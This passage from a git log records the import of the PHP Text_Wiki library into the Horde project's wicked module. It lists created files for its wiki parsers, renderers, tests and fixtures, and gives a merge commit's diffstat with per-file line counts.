 create mode 100644 Text/Wiki/Render/Latex/Anchor.php
 create mode 100644 Text/Wiki/Render/Latex/Blockquote.php
 create mode 100644 Text/Wiki/Render/Latex/Bold.php
 create mode 100644 Text/Wiki/Render/Latex/Box.php
 create mode 100644 Text/Wiki/Render/Latex/Break.php
 create mode 100644 Text/Wiki/Render/Latex/Center.php
 create mode 100644 Text/Wiki/Render/Latex/Code.php
 create mode 100644 Text/Wiki/Render/Latex/Colortext.php
 create mode 100644 Text/Wiki/Render/Latex/Deflist.php
 create mode 100644 Text/Wiki/Render/Latex/Delimiter.php
 create mode 100644 Text/Wiki/Render/Latex/Embed.php
 create mode 100644 Text/Wiki/Render/Latex/Emphasis.php
 create mode 100644 Text/Wiki/Render/Latex/Font.php
 create mode 100644 Text/Wiki/Render/Latex/Freelink.php
 create mode 100644 Text/Wiki/Render/Latex/Function.php
 create mode 100644 Text/Wiki/Render/Latex/Heading.php
 create mode 100644 Text/Wiki/Render/Latex/Horiz.php
 create mode 100644 Text/Wiki/Render/Latex/Html.php
 create mode 100644 Text/Wiki/Render/Latex/Image.php
 create mode 100644 Text/Wiki/Render/Latex/Include.php
 create mode 100644 Text/Wiki/Render/Latex/Interwiki.php
 create mode 100644 Text/Wiki/Render/Latex/Italic.php
 create mode 100644 Text/Wiki/Render/Latex/List.php
 create mode 100644 Text/Wiki/Render/Latex/Newline.php
 create mode 100644 Text/Wiki/Render/Latex/Page.php
 create mode 100644 Text/Wiki/Render/Latex/Paragraph.php
 create mode 100644 Text/Wiki/Render/Latex/Phplookup.php
 create mode 100644 Text/Wiki/Render/Latex/Plugin.php
 create mode 100644 Text/Wiki/Render/Latex/Prefilter.php
 create mode 100644 Text/Wiki/Render/Latex/Preformatted.php
 create mode 100644 Text/Wiki/Render/Latex/Raw.php
 create mode 100644 Text/Wiki/Render/Latex/Revise.php
 create mode 100644 Text/Wiki/Render/Latex/Smiley.php
 create mode 100644 Text/Wiki/Render/Latex/Specialchar.php
 create mode 100644 Text/Wiki/Render/Latex/Strong.php
 create mode 100644 Text/Wiki/Render/Latex/Subscript.php
 create mode 100644 Text/Wiki/Render/Latex/Superscript.php
 create mode 100644 Text/Wiki/Render/Latex/Table.php
 create mode 100644 Text/Wiki/Render/Latex/Tighten.php
 create mode 100644 Text/Wiki/Render/Latex/Titlebar.php
 create mode 100644 Text/Wiki/Render/Latex/Toc.php
 create mode 100644 Text/Wiki/Render/Latex/Tt.php
 create mode 100644 Text/Wiki/Render/Latex/Underline.php
 create mode 100644 Text/Wiki/Render/Latex/Url.php
 create mode 100644 Text/Wiki/Render/Latex/Wikilink.php
 create mode 100644 Text/Wiki/Render/Plain.php
 create mode 100644 Text/Wiki/Render/Plain/Anchor.php
 create mode 100644 Text/Wiki/Render/Plain/Blockquote.php
 create mode 100644 Text/Wiki/Render/Plain/Bold.php
 create mode 100644 Text/Wiki/Render/Plain/Box.php
 create mode 100644 Text/Wiki/Render/Plain/Break.php
 create mode 100644 Text/Wiki/Render/Plain/Center.php
 create mode 100644 Text/Wiki/Render/Plain/Code.php
 create mode 100644 Text/Wiki/Render/Plain/Colortext.php
 create mode 100644 Text/Wiki/Render/Plain/Deflist.php
 create mode 100644 Text/Wiki/Render/Plain/Delimiter.php
 create mode 100644 Text/Wiki/Render/Plain/Embed.php
 create mode 100644 Text/Wiki/Render/Plain/Emphasis.php
 create mode 100644 Text/Wiki/Render/Plain/Font.php
 create mode 100644 Text/Wiki/Render/Plain/Freelink.php
 create mode 100644 Text/Wiki/Render/Plain/Function.php
 create mode 100644 Text/Wiki/Render/Plain/Heading.php
 create mode 100644 Text/Wiki/Render/Plain/Horiz.php
 create mode 100644 Text/Wiki/Render/Plain/Html.php
 create mode 100644 Text/Wiki/Render/Plain/Image.php
 create mode 100644 Text/Wiki/Render/Plain/Include.php
 create mode 100644 Text/Wiki/Render/Plain/Interwiki.php
 create mode 100644 Text/Wiki/Render/Plain/Italic.php
 create mode 100644 Text/Wiki/Render/Plain/List.php
 create mode 100644 Text/Wiki/Render/Plain/Newline.php
 create mode 100644 Text/Wiki/Render/Plain/Page.php
 create mode 100644 Text/Wiki/Render/Plain/Paragraph.php
 create mode 100644 Text/Wiki/Render/Plain/Phplookup.php
 create mode 100644 Text/Wiki/Render/Plain/Plugin.php
 create mode 100644 Text/Wiki/Render/Plain/Prefilter.php
 create mode 100644 Text/Wiki/Render/Plain/Preformatted.php
 create mode 100644 Text/Wiki/Render/Plain/Raw.php
 create mode 100644 Text/Wiki/Render/Plain/Revise.php
 create mode 100644 Text/Wiki/Render/Plain/Smiley.php
 create mode 100644 Text/Wiki/Render/Plain/Specialchar.php
 create mode 100644 Text/Wiki/Render/Plain/Strong.php
 create mode 100644 Text/Wiki/Render/Plain/Subscript.php
 create mode 100644 Text/Wiki/Render/Plain/Superscript.php
 create mode 100644 Text/Wiki/Render/Plain/Table.php
 create mode 100644 Text/Wiki/Render/Plain/Tighten.php
 create mode 100644 Text/Wiki/Render/Plain/Titlebar.php
 create mode 100644 Text/Wiki/Render/Plain/Toc.php
 create mode 100644 Text/Wiki/Render/Plain/Tt.php
 create mode 100644 Text/Wiki/Render/Plain/Underline.php
 create mode 100644 Text/Wiki/Render/Plain/Url.php
 create mode 100644 Text/Wiki/Render/Plain/Wikilink.php
 create mode 100644 Text/Wiki/Render/Tiki.php
 create mode 100644 Text/Wiki/Render/Tiki/Anchor.php
 create mode 100644 Text/Wiki/Render/Tiki/Blockquote.php
 create mode 100644 Text/Wiki/Render/Tiki/Bold.php
 create mode 100644 Text/Wiki/Render/Tiki/Box.php
 create mode 100644 Text/Wiki/Render/Tiki/Break.php
 create mode 100644 Text/Wiki/Render/Tiki/Center.php
 create mode 100644 Text/Wiki/Render/Tiki/Code.php
 create mode 100644 Text/Wiki/Render/Tiki/Colortext.php
 create mode 100644 Text/Wiki/Render/Tiki/Deflist.php
 create mode 100644 Text/Wiki/Render/Tiki/Delimiter.php
 create mode 100644 Text/Wiki/Render/Tiki/Embed.php
 create mode 100644 Text/Wiki/Render/Tiki/Emphasis.php
 create mode 100644 Text/Wiki/Render/Tiki/Freelink.php
 create mode 100644 Text/Wiki/Render/Tiki/Function.php
 create mode 100755 Text/Wiki/Render/Tiki/Heading.php
 create mode 100644 Text/Wiki/Render/Tiki/Horiz.php
 create mode 100644 Text/Wiki/Render/Tiki/Html.php
 create mode 100644 Text/Wiki/Render/Tiki/Image.php
 create mode 100644 Text/Wiki/Render/Tiki/Include.php
 create mode 100644 Text/Wiki/Render/Tiki/Interwiki.php
 create mode 100644 Text/Wiki/Render/Tiki/Italic.php
 create mode 100644 Text/Wiki/Render/Tiki/List.php
 create mode 100644 Text/Wiki/Render/Tiki/Newline.php
 create mode 100644 Text/Wiki/Render/Tiki/Paragraph.php
 create mode 100644 Text/Wiki/Render/Tiki/Phplookup.php
 create mode 100644 Text/Wiki/Render/Tiki/Prefilter.php
 create mode 100644 Text/Wiki/Render/Tiki/Preformatted.php
 create mode 100644 Text/Wiki/Render/Tiki/Raw.php
 create mode 100644 Text/Wiki/Render/Tiki/Redirect.php
 create mode 100644 Text/Wiki/Render/Tiki/Revise.php
 create mode 100644 Text/Wiki/Render/Tiki/Strong.php
 create mode 100755 Text/Wiki/Render/Tiki/Subscript.php
 create mode 100644 Text/Wiki/Render/Tiki/Superscript.php
 create mode 100644 Text/Wiki/Render/Tiki/Table.php
 create mode 100644 Text/Wiki/Render/Tiki/Tighten.php
 create mode 100644 Text/Wiki/Render/Tiki/Toc.php
 create mode 100644 Text/Wiki/Render/Tiki/Tt.php
 create mode 100644 Text/Wiki/Render/Tiki/Underline.php
 create mode 100644 Text/Wiki/Render/Tiki/Url.php
 create mode 100644 Text/Wiki/Render/Tiki/Wikilink.php
 create mode 100644 Text/Wiki/Render/Xhtml.php
 create mode 100644 Text/Wiki/Render/Xhtml/Address.php
 create mode 100644 Text/Wiki/Render/Xhtml/Anchor.php
 create mode 100644 Text/Wiki/Render/Xhtml/Blockquote.php
 create mode 100644 Text/Wiki/Render/Xhtml/Bold.php
 create mode 100644 Text/Wiki/Render/Xhtml/Box.php
 create mode 100644 Text/Wiki/Render/Xhtml/Break.php
 create mode 100644 Text/Wiki/Render/Xhtml/Center.php
 create mode 100644 Text/Wiki/Render/Xhtml/Code.php
 create mode 100644 Text/Wiki/Render/Xhtml/Colortext.php
 create mode 100644 Text/Wiki/Render/Xhtml/Deflist.php
 create mode 100644 Text/Wiki/Render/Xhtml/Delimiter.php
 create mode 100644 Text/Wiki/Render/Xhtml/Embed.php
 create mode 100644 Text/Wiki/Render/Xhtml/Emphasis.php
 create mode 100644 Text/Wiki/Render/Xhtml/Font.php
 create mode 100644 Text/Wiki/Render/Xhtml/Freelink.php
 create mode 100644 Text/Wiki/Render/Xhtml/Function.php
 create mode 100644 Text/Wiki/Render/Xhtml/Heading.php
 create mode 100644 Text/Wiki/Render/Xhtml/Horiz.php
 create mode 100644 Text/Wiki/Render/Xhtml/Html.php
 create mode 100644 Text/Wiki/Render/Xhtml/Image.php
 create mode 100644 Text/Wiki/Render/Xhtml/Include.php
 create mode 100644 Text/Wiki/Render/Xhtml/Interwiki.php
 create mode 100644 Text/Wiki/Render/Xhtml/Italic.php
 create mode 100644 Text/Wiki/Render/Xhtml/List.php
 create mode 100644 Text/Wiki/Render/Xhtml/Newline.php
 create mode 100644 Text/Wiki/Render/Xhtml/Page.php
 create mode 100644 Text/Wiki/Render/Xhtml/Paragraph.php
 create mode 100644 Text/Wiki/Render/Xhtml/Phplookup.php
 create mode 100644 Text/Wiki/Render/Xhtml/Plugin.php
 create mode 100644 Text/Wiki/Render/Xhtml/Prefilter.php
 create mode 100644 Text/Wiki/Render/Xhtml/Preformatted.php
 create mode 100644 Text/Wiki/Render/Xhtml/Raw.php
 create mode 100644 Text/Wiki/Render/Xhtml/Revise.php
 create mode 100644 Text/Wiki/Render/Xhtml/Smiley.php
 create mode 100644 Text/Wiki/Render/Xhtml/Specialchar.php
 create mode 100644 Text/Wiki/Render/Xhtml/Strong.php
 create mode 100644 Text/Wiki/Render/Xhtml/Subscript.php
 create mode 100644 Text/Wiki/Render/Xhtml/Superscript.php
 create mode 100644 Text/Wiki/Render/Xhtml/Table.php
 create mode 100644 Text/Wiki/Render/Xhtml/Tighten.php
 create mode 100644 Text/Wiki/Render/Xhtml/Titlebar.php
 create mode 100644 Text/Wiki/Render/Xhtml/Toc.php
 create mode 100644 Text/Wiki/Render/Xhtml/Tt.php
 create mode 100644 Text/Wiki/Render/Xhtml/Underline.php
 create mode 100644 Text/Wiki/Render/Xhtml/Url.php
 create mode 100644 Text/Wiki/Render/Xhtml/Wikilink.php
 create mode 100644 Text/Wiki/Tiki.php
 create mode 100644 composer.json
 create mode 100644 doc/BBCodeParser.php
 create mode 100644 doc/BBCodeParser_V2.ini
 create mode 100644 doc/BBtest.txt
 create mode 100644 doc/README_BBCodeParser
 create mode 100644 doc/parser.php
 create mode 100644 doc/test_Text_Wiki.php
 create mode 100644 package.xml
 create mode 100644 packageBBCode.xml
 create mode 100644 packageCowiki.xml
 create mode 100644 packageCreole.xml
 create mode 100644 packageDoku.xml
 create mode 100644 packageMediawiki.xml
 create mode 100644 packageTiki.xml
 create mode 100644 tests/AllTests.php
 create mode 100644 tests/BBCode/7908.phpt
 create mode 100644 tests/Cowiki_Render_Url.phpt
 create mode 100644 tests/Creole_Parse_Url.phpt
 create mode 100644 tests/Creole_Render_Url.phpt
 create mode 100644 tests/Default_Parse_BlockQuote.phpt
 create mode 100644 tests/Docbook_Render_Url.phpt
 create mode 100644 tests/Doku_Render_Url.phpt
 create mode 100644 tests/Latex_Render_Url.phpt
 create mode 100644 tests/Plain_Render_Url.phpt
 create mode 100644 tests/Text_Wiki_BugTests.php
 create mode 100644 tests/Text_Wiki_Generic_Transform_Tests.php
 create mode 100644 tests/Text_Wiki_Parse_Mediawiki_Tests.php
 create mode 100644 tests/Text_Wiki_Parse_Tiki_Tests.php
 create mode 100644 tests/Text_Wiki_Render_Tests.php
 create mode 100644 tests/Text_Wiki_Render_Tiki_Tests.php
 create mode 100644 tests/Text_Wiki_Tests.php
 create mode 100644 tests/Xhtml_Render_Url.phpt
 create mode 100644 tests/fixtures/bug11649.txt
 create mode 100644 tests/fixtures/mediawiki_syntax.txt
 create mode 100644 tests/fixtures/mediawiki_syntax_to_test_preformatted.txt
 create mode 100644 tests/fixtures/mediawiki_syntax_to_test_raw.txt
 create mode 100644 tests/fixtures/mediawiki_syntax_to_test_wikilink.txt
 create mode 100644 tests/fixtures/test_mediawiki_to_tiki_lists_output.txt
 create mode 100644 tests/fixtures/test_mediawiki_to_tiki_lists_source.txt
 create mode 100644 tests/fixtures/test_mediawiki_to_tiki_output.txt
 create mode 100644 tests/fixtures/test_mediawiki_to_tiki_redirect_output.txt
 create mode 100644 tests/fixtures/test_mediawiki_to_tiki_redirect_source.txt
 create mode 100644 tests/fixtures/test_mediawiki_to_tiki_source.txt
 create mode 100644 tests/fixtures/test_mediawiki_wikilink_expected_matches.php
 create mode 100644 tests/fixtures/test_tiki_heading_expected_matches.php
 create mode 100644 tests/fixtures/test_tiki_to_tiki_heading_source.txt
 create mode 100644 tests/fixtures/text_wiki_sample_mediawiki_syntax.txt
 create mode 100644 tests/fixtures/text_wiki_sample_syntax_transformed_to_plain.txt
 create mode 100644 tests/fixtures/text_wiki_sample_syntax_transformed_to_plain2.txt
 create mode 100644 tests/fixtures/text_wiki_sample_syntax_transformed_to_xhtml.txt
 create mode 100644 tests/fixtures/tiki_syntax.txt

http://github.com/horde/horde/commit/9460590060bdc10d6e7f02ca44b2dc586e236504

-----------------------------------------------------------------------

commit 68ece8f7d7bfae48bb360912a9943ca4cf41d2d6
Merge: 12c00f8 9460590
Author: Jan Schneider 
Date:   Mon Sep 4 17:41:31 2017 +0200

    Merge commit '9460590060bdc10d6e7f02ca44b2dc586e236504' as 'wicked/lib/Text_Wiki'

 wicked/lib/Text_Wiki/.gitignore                    |    4 +
 wicked/lib/Text_Wiki/.travis.yml                   |    7 +
 wicked/lib/Text_Wiki/Text/Wiki.php                 | 1559 ++++++++++++++++++++
 wicked/lib/Text_Wiki/Text/Wiki/BBCode.php          |  100 ++
 wicked/lib/Text_Wiki/Text/Wiki/Cowiki.php          |   43 +
 wicked/lib/Text_Wiki/Text/Wiki/Creole.php          |  150 ++
 wicked/lib/Text_Wiki/Text/Wiki/Default.php         |   27 +
 wicked/lib/Text_Wiki/Text/Wiki/Doku.php            |   43 +
 wicked/lib/Text_Wiki/Text/Wiki/Mediawiki.php       |   95 ++
 wicked/lib/Text_Wiki/Text/Wiki/Parse.php           |  280 ++++
 .../Text/Wiki/Parse/BBCode/Blockquote.php          |   91 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/BBCode/Bold.php  |   63 +
 .../lib/Text_Wiki/Text/Wiki/Parse/BBCode/Code.php  |   63 +
 .../Text_Wiki/Text/Wiki/Parse/BBCode/Colortext.php |   92 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/BBCode/Font.php  |   87 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/BBCode/Image.php |  102 ++
 .../Text_Wiki/Text/Wiki/Parse/BBCode/Italic.php    |   62 +
 .../lib/Text_Wiki/Text/Wiki/Parse/BBCode/List.php  |  187 +++
 .../Text_Wiki/Text/Wiki/Parse/BBCode/Subscript.php |   85 ++
 .../Text/Wiki/Parse/BBCode/Superscript.php         |   84 ++
 .../Text_Wiki/Text/Wiki/Parse/BBCode/Underline.php |   63 +
 .../lib/Text_Wiki/Text/Wiki/Parse/BBCode/Url.php   |  185 +++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Anchor.php    |   88 ++
 .../Text/Wiki/Parse/Cowiki/Blockquote.php          |  180 +++
 .../lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Bold.php  |   79 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Break.php |   73 +
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Center.php    |   79 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Code.php  |   99 ++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Colortext.php |   90 ++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Deflist.php   |  123 ++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Delimiter.php |   80 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Embed.php |  107 ++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Emphasis.php  |   81 +
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Freelink.php  |   74 +
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Function.php  |  142 ++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Heading.php   |  107 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Horiz.php |   70 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Html.php  |   76 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Image.php |   85 ++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Include.php   |  100 ++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Interwiki.php |  142 ++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Italic.php    |   79 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Cowiki/List.php  |  246 +++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Newline.php   |   75 +
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Paragraph.php |  146 ++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Phplookup.php |   73 +
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Prefilter.php |   78 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Raw.php   |   72 +
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Revise.php    |  170 +++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Strong.php    |   85 ++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Subscript.php |   79 +
 .../Text/Wiki/Parse/Cowiki/Superscript.php         |   79 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Table.php |  214 +++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Tighten.php   |   49 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Toc.php   |   93 ++
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Tt.php |   84 ++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Underline.php |   79 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Url.php   |  281 ++++
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Wikilink.php  |  227 +++
 .../Text_Wiki/Text/Wiki/Parse/Creole/Address.php   |   67 +
 .../Text/Wiki/Parse/Creole/Blockquote.php          |  176 +++
 .../lib/Text_Wiki/Text/Wiki/Parse/Creole/Bold.php  |   82 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Creole/Box.php   |   81 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Creole/Break.php |   73 +
 .../Text_Wiki/Text/Wiki/Parse/Creole/Center.php    |   78 +
 .../Text_Wiki/Text/Wiki/Parse/Creole/Deflist.php   |  129 ++
 .../Text_Wiki/Text/Wiki/Parse/Creole/Delimiter.php |   68 +
 .../Text_Wiki/Text/Wiki/Parse/Creole/Emphasis.php  |   83 ++
 .../Text_Wiki/Text/Wiki/Parse/Creole/Footnote.php  |   83 ++
 .../Text_Wiki/Text/Wiki/Parse/Creole/Heading.php   |   97 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Creole/Horiz.php |   58 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Creole/Image.php |   69 +
 .../Text_Wiki/Text/Wiki/Parse/Creole/Italic.php    |   81 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Creole/List.php  |  244 +++
 .../Text_Wiki/Text/Wiki/Parse/Creole/Newline.php   |   60 +
 .../Text_Wiki/Text/Wiki/Parse/Creole/Paragraph.php |  139 ++
 .../Text_Wiki/Text/Wiki/Parse/Creole/Prefilter.php |   54 +
 .../Text/Wiki/Parse/Creole/Preformatted.php        |   68 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Creole/Raw.php   |   61 +
 .../Text_Wiki/Text/Wiki/Parse/Creole/Strong.php    |   84 ++
 .../Text_Wiki/Text/Wiki/Parse/Creole/Subscript.php |   75 +
 .../Text/Wiki/Parse/Creole/Superscript.php         |   75 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Creole/Table.php |  207 +++
 .../Text_Wiki/Text/Wiki/Parse/Creole/Tighten.php   |   37 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Creole/Trim.php  |   75 +
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Creole/Tt.php |   78 +
 .../Text_Wiki/Text/Wiki/Parse/Creole/Underline.php |   83 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Creole/Url.php   |  109 ++
 .../Text_Wiki/Text/Wiki/Parse/Creole/Wikilink.php  |  322 ++++
 .../Text_Wiki/Text/Wiki/Parse/Default/Anchor.php   |   87 ++
 .../Text/Wiki/Parse/Default/Blockquote.php         |  162 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Default/Bold.php |   79 +
 .../Text_Wiki/Text/Wiki/Parse/Default/Break.php    |   72 +
 .../Text_Wiki/Text/Wiki/Parse/Default/Center.php   |   78 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Default/Code.php |  100 ++
 .../Text/Wiki/Parse/Default/Colortext.php          |   89 ++
 .../Text_Wiki/Text/Wiki/Parse/Default/Deflist.php  |  122 ++
 .../Text/Wiki/Parse/Default/Delimiter.php          |   97 ++
 .../Text_Wiki/Text/Wiki/Parse/Default/Embed.php    |  106 ++
 .../Text_Wiki/Text/Wiki/Parse/Default/Emphasis.php |   85 ++
 .../Text_Wiki/Text/Wiki/Parse/Default/Freelink.php |  150 ++
 .../Text_Wiki/Text/Wiki/Parse/Default/Function.php |  141 ++
 .../Text_Wiki/Text/Wiki/Parse/Default/Heading.php  |  107 ++
 .../Text_Wiki/Text/Wiki/Parse/Default/Horiz.php    |   70 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Default/Html.php |   75 +
 .../Text_Wiki/Text/Wiki/Parse/Default/Image.php    |  149 ++
 .../Text_Wiki/Text/Wiki/Parse/Default/Include.php  |  100 ++
 .../Text/Wiki/Parse/Default/Interwiki.php          |  138 ++
 .../Text_Wiki/Text/Wiki/Parse/Default/Italic.php   |   85 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Default/List.php |  262 ++++
 .../Text_Wiki/Text/Wiki/Parse/Default/Newline.php  |   75 +
 .../Text/Wiki/Parse/Default/Paragraph.php          |  116 ++
 .../Text/Wiki/Parse/Default/Phplookup.php          |   73 +
 .../Text/Wiki/Parse/Default/Prefilter.php          |   84 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Default/Raw.php  |   73 +
 .../Text_Wiki/Text/Wiki/Parse/Default/Revise.php   |  145 ++
 .../Text_Wiki/Text/Wiki/Parse/Default/Smiley.php   |  170 +++
 .../Text_Wiki/Text/Wiki/Parse/Default/Strong.php   |   86 ++
 .../Text/Wiki/Parse/Default/Subscript.php          |   79 +
 .../Text/Wiki/Parse/Default/Superscript.php        |   79 +
 .../Text_Wiki/Text/Wiki/Parse/Default/Table.php    |  226 +++
 .../Text_Wiki/Text/Wiki/Parse/Default/Tighten.php  |   49 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Default/Toc.php  |  130 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Default/Tt.php   |   84 ++
 .../Text/Wiki/Parse/Default/Underline.php          |   79 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Default/Url.php  |  296 ++++
 .../Text_Wiki/Text/Wiki/Parse/Default/Wikilink.php |  222 +++
 .../lib/Text_Wiki/Text/Wiki/Parse/Doku/Anchor.php  |   88 ++
 .../Text_Wiki/Text/Wiki/Parse/Doku/Blockquote.php  |  180 +++
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Doku/Bold.php |   79 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Doku/Break.php   |   73 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Doku/Center.php  |   79 +
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Doku/Code.php |   95 ++
 .../Text_Wiki/Text/Wiki/Parse/Doku/Colortext.php   |   90 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Doku/Deflist.php |  123 ++
 .../Text_Wiki/Text/Wiki/Parse/Doku/Delimiter.php   |   80 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Doku/Embed.php   |  107 ++
 .../Text_Wiki/Text/Wiki/Parse/Doku/Emphasis.php    |   85 ++
 .../Text_Wiki/Text/Wiki/Parse/Doku/Freelink.php    |   99 ++
 .../Text_Wiki/Text/Wiki/Parse/Doku/Function.php    |  142 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Doku/Heading.php |  107 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Doku/Horiz.php   |   70 +
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Doku/Html.php |   75 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Doku/Image.php   |   99 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Doku/Include.php |  101 ++
 .../Text_Wiki/Text/Wiki/Parse/Doku/Interwiki.php   |   96 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Doku/Italic.php  |   84 ++
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Doku/List.php |  248 ++++
 .../lib/Text_Wiki/Text/Wiki/Parse/Doku/Newline.php |   75 +
 .../Text_Wiki/Text/Wiki/Parse/Doku/Paragraph.php   |  146 ++
 .../Text_Wiki/Text/Wiki/Parse/Doku/Phplookup.php   |   74 +
 .../Text_Wiki/Text/Wiki/Parse/Doku/Prefilter.php   |   78 +
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Doku/Raw.php  |   87 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Doku/Revise.php  |  168 +++
 .../lib/Text_Wiki/Text/Wiki/Parse/Doku/Strong.php  |   90 ++
 .../Text_Wiki/Text/Wiki/Parse/Doku/Subscript.php   |   79 +
 .../Text_Wiki/Text/Wiki/Parse/Doku/Superscript.php |   79 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Doku/Table.php   |  240 +++
 .../lib/Text_Wiki/Text/Wiki/Parse/Doku/Tighten.php |   49 +
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Doku/Toc.php  |   84 ++
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Doku/Tt.php   |   84 ++
 .../Text_Wiki/Text/Wiki/Parse/Doku/Underline.php   |   79 +
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Doku/Url.php  |  326 ++++
 .../Text_Wiki/Text/Wiki/Parse/Doku/Wikilink.php    |  123 ++
 .../Text_Wiki/Text/Wiki/Parse/Mediawiki/Break.php  |   59 +
 .../Text_Wiki/Text/Wiki/Parse/Mediawiki/Code.php   |   91 ++
 .../Text/Wiki/Parse/Mediawiki/Comment.php          |   59 +
 .../Text/Wiki/Parse/Mediawiki/Deflist.php          |  293 ++++
 .../Text/Wiki/Parse/Mediawiki/Emphasis.php         |  264 ++++
 .../Text/Wiki/Parse/Mediawiki/Heading.php          |   94 ++
 .../Text_Wiki/Text/Wiki/Parse/Mediawiki/List.php   |  232 +++
 .../Text/Wiki/Parse/Mediawiki/Newline.php          |   59 +
 .../Text/Wiki/Parse/Mediawiki/Preformatted.php     |   72 +
 .../Text_Wiki/Text/Wiki/Parse/Mediawiki/Raw.php    |   61 +
 .../Text/Wiki/Parse/Mediawiki/Redirect.php         |   77 +
 .../Text/Wiki/Parse/Mediawiki/Subscript.php        |   65 +
 .../Text/Wiki/Parse/Mediawiki/Superscript.php      |   65 +
 .../Text_Wiki/Text/Wiki/Parse/Mediawiki/Table.php  |  286 ++++
 .../lib/Text_Wiki/Text/Wiki/Parse/Mediawiki/Tt.php |   71 +
 .../Text_Wiki/Text/Wiki/Parse/Mediawiki/Url.php    |  318 ++++
 .../Text/Wiki/Parse/Mediawiki/Wikilink.php         |  312 ++++
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Anchor.php  |   89 ++
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Blockquote.php  |  181 +++
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Bold.php |   81 +
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Box.php  |   81 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Break.php   |   74 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Center.php  |   80 +
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Code.php |  116 ++
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Colortext.php   |   91 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Deflist.php |  124 ++
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Delimiter.php   |   82 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Embed.php   |  108 ++
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Emphasis.php    |   87 ++
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Freelink.php    |  138 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Heading.php |  132 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Horiz.php   |   72 +
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Html.php |   77 +
